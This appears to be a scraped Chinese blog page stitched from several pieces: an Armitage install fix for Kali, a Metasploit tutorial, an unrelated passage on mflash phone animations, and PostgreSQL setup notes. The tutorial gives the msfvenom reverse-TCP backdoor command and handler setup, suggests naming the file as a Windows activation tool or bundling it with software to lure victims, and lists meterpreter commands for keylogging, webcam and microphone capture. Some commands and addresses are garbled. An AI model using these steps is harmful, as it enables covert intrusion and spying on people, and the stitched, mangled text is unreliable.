
1 环境及软件
2 程序安装
旧版安装程序下载地址
>安装好kali20后测试是否可以启动重启postgresql服务,初始化msfdb,点击armitage
提示连接错误,kali20会变得特别卡顿下面我们来看一下解决方法
我们进入armitage的官网,然后下载linux平台的压缩包
下载完成后将下载的文件解压到/usr/share/目录下,(可以先删除原有的armitage文件夹,或者直接覆盖原文件夹)
用到的命令:解压命令tar
-xf
armitage150813tgz
删除原有的rm
/usr/share/armitage
目录
切换到
armitage所在目录
复制新的armitage文件夹到/usr/share/:
cp
-r
armitage
/usr/share
完成后重启
重启完成后重启postgresql服务,初始化msfdb,
/etc/initd/postgresql
restart
msfdb
init
运行armitage测试
,运行成功(如果帮到你点个赞呗)
前言
最近整理了一些 奇安信&华为&深信服大佬 的课件资料+大厂面试课题,想要的可以私信自取, 无偿赠送 给粉丝朋友~
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode是用来生成后门的软件。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
演示环境
使用Kali 20213进行演示 *** 作
目标靶机: Win10专业版
软件:msfvenom、msfconsole(Kali系统内置)
1进入管理员模式
命令: sudo su
解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令
命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip> LPORT=本地端口号> –f exe –o 文件名>exe
解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址
本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性
文件名可以随便写自己喜欢的名字,比如写Win10激活工具,可能更容易让目标主机上钩
当然MSF也可以用来渗透手机、mac、Linux等
接下来运行命令生成文件
默认生成的文件在根目录下
把刚才生成的文件放到目标靶机Win10系统中
命令: msfconsole
(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192168321(填写自己主机的IP地址)
(4)命令: set lport 1111(填写刚才生成文件时的端口号)
(5)命令: show options(查看设置参数)
(6)命令: exploit -z -j(后台执行)
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面
(1)命令: sessions (查看上钩的用户)
(2)命令: sessions -i 1 (选择需要攻击的用户,这里选择第 1 个
命令: run vnc -i
cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有d窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本
————————————————
原文链接:> 打开msf想要装了vis播放器,以便进行解析和播放。 分析: SF为后缀名的文件是手机动画mflash(基于矢量图形解决方案VIS提供的服务,其内容格式为vis,流媒体功能的内容格式为msf,兼容avi等格式)。 通过专用工具制作并上传到mflash平台上,通过WAP网关,即通过GPRS下载到手机本地(手机预装了vis播放器,以便进行解析和播放)。 mflash内容分为头文件和动画文件,头文件里有动画内容的属性等,在用户下载mflash内容时手机内的播放器将解析头文件,也可以说是解密,解密之后才下载真正的动画文件。 如果不是通过mflash平台下载mflash内容将在手机里无法播放,因为中间有个加密和解密的过程。
安装数据库的时候会自动创建系统用户postgres,数据库用户postgres,数据库postgres
1、apt-get install postgresql //安装postgresql数据库
2、su - postgres //切换到postgres用户
3、psql //登陆postgresql数据库,首次登陆没有密码
4、\password postgres //修改数据库用户postgres的密码
msf使用数据库
1、msfconsole //启动msf
2、db_connect postgres:hehehe@127001/test //用户名,密码,地址,自己随意编造的名字。
3、db_status //查看数据库连接状态
安装完成,可以开始你的metasploit渗透之路了!!!
5
参考:如果希望添加新的用户
建立一个普通用户
useradd -m feng //feng是我的用户名,你可以改成任意用户名。
passwd feng //设置一下新建的用户名的密码。
usermod -a -G sudo feng //修改用户的附加组为超级管理组。
chsh -s /bin/bash feng //设置用户使用的命令控制台。
6
sure : if you want to download it from ">
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)